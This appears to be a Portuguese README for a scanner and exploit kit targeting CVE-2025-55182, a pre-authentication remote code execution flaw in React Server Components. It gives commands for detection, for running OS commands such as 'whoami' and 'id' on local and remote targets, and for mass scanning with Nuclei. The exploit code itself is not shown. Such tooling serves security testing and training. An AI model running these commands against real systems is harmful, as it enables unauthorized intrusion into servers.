
Kit de ferramentas de scanner e exploit para CVE-2025-55182, um RCE crítico pré-autenticação em React Server Components. Inclui detecção, shell interativo, implantação Docker e análise técnica educacional.
Um kit de ferramentas abrangente de testes de segurança para CVE-2025-55182, uma vulnerabilidade crítica de execução remota de código sem autenticação em React Server Components.
Quer entender essa vulnerabilidade 100%?
📖 Leia nossa Análise Técnica Completa - Tudo que você precisa saber:
- Por que o React roda no servidor (não só no navegador!)
- Como o ataque funciona com diagramas visuais
- Cada linha do exploit explicada
- Desde conceitos básicos até exploração avançada
- Nenhum pré-requisito necessário!
Perfeito para: Relatórios de segurança, materiais de treinamento, análise de ameaças, ou apenas aprendizado!
Esta vulnerabilidade afeta as versões 19.0.0 a 19.2.0 do React Server Components, impactando:
react-server-dom-parcelreact-server-dom-turbopackreact-server-dom-webpackImpacto: Atacantes não autenticados podem executar código arbitrário remotamente através de desserialização insegura de payloads de requisições HTTP para endpoints de Server Functions.
👉 Leia a Análise Técnica Completa - Um guia abrangente cobrindo:
Perfeito para:
Nenhum conhecimento prévio necessário - começa do básico e avança até técnicas avançadas de exploração!
APENAS PARA FINS EDUCACIONAIS E TESTES DE SEGURANÇA AUTORIZADOS
Esta ferramenta destina-se exclusivamente a:
Aviso: O acesso não autorizado a sistemas de computador é ilegal. Os usuários são responsáveis por cumprir todas as leis e regulamentos aplicáveis. Os autores não assumem nenhuma responsabilidade pelo uso indevido desta ferramenta.
Nenhuma dependência necessária! Script bash único para testes rápidos.
👉 EXPLOIT_SCRIPT.md - Script autônomo que:
# Alvo único
./exploit-cve-2025-55182.sh http://target.com
# Múltiplos alvos
./exploit-cve-2025-55182.sh -f targets.txt
Kit completo com Docker, Interface Web e integração com Nuclei. Continue lendo abaixo para instalação.
| Recurso | Descrição |
|---|---|
| 🐳 Suporte Docker | Implantação com um comando usando Docker Compose |
| 🌐 Interface Web | Interface web amigável para usuários não técnicos |
| 🔍 Ambiente de Teste Vulnerável | Inicie uma aplicação vulnerável local para testes seguros |
| 🎯 Varredura Remota | Teste alvos externos quanto à vulnerabilidade |
| ⚡ Shell Interativo | Execute comandos do SO e veja resultados em tempo real |
| 📊 Múltiplos Modos de Varredura | Apenas detecção ou exploração completa |
| 📝 Relatórios Detalhados | Formatos de saída JSON e texto |
| 🔧 Integração com Nuclei | Aproveite o poderoso scanner da ProjectDiscovery |
Escolha seu método de instalação:
# Clone o repositório
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Inicie o scanner
docker compose up
# Acesse a interface web em http://localhost:3001
# Clone o repositório
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Instale o Nuclei (macOS)
brew install nuclei
# Torne os scripts executáveis
chmod +x scripts/*.sh
📖 Configuração Detalhada: Veja SETUP_GUIDE.md para instruções passo a passo
⚡ Referência Rápida: Veja QUICKSTART.md para casos de uso comuns
Iniciar Interface Web:
docker compose up
# Abra o navegador: http://localhost:3001
Iniciar com Aplicação de Teste Vulnerável:
docker compose --profile with-vulnerable-app up
# Scanner: http://localhost:3001
# App vulnerável: http://localhost:3000
Importante para usuários Docker: Ao escanear pelo Docker, use:
http://host.docker.internal:3000 para escanear aplicativos na sua máquina hosthttp://vulnerable-app:3000 para escanear o aplicativo vulnerável conteinerizadohttps://example.com para alvos externoshttp://localhost:3001Crie e teste contra uma aplicação vulnerável local:
# Terminal 1: Inicie o app vulnerável
./scripts/setup-vulnerable-app.sh
# O app roda em http://localhost:3000
# Terminal 2: Teste-o
./scripts/test-local.sh
# Execute comandos personalizados
./scripts/test-local.sh "whoami"
./scripts/test-local.sh "pwd"
./scripts/test-local.sh "ls -la"
# Varredura básica
./scripts/test-remote.sh https://target.com
# Com execução de comando
./scripts/test-remote.sh https://target.com "id"
# Crie um arquivo de alvos
cat > targets.txt << EOF
https://target1.com
https://target2.com
https://target3.com
EOF
# Escaneie todos os alvos
./scripts/test-multiple.sh targets.txt
Detecção básica de vulnerabilidade:
nuclei -t templates/cve-2025-55182.yaml -u http://localhost:3000 -v
Executar comandos personalizados:
nuclei -t templates/cve-2025-55182-interactive.yaml \
-u http://localhost:3000 \
-var cmd="whoami" \
-v
Escanear múltiplos alvos:
nuclei -t templates/cve-2025-55182.yaml -l targets.txt -v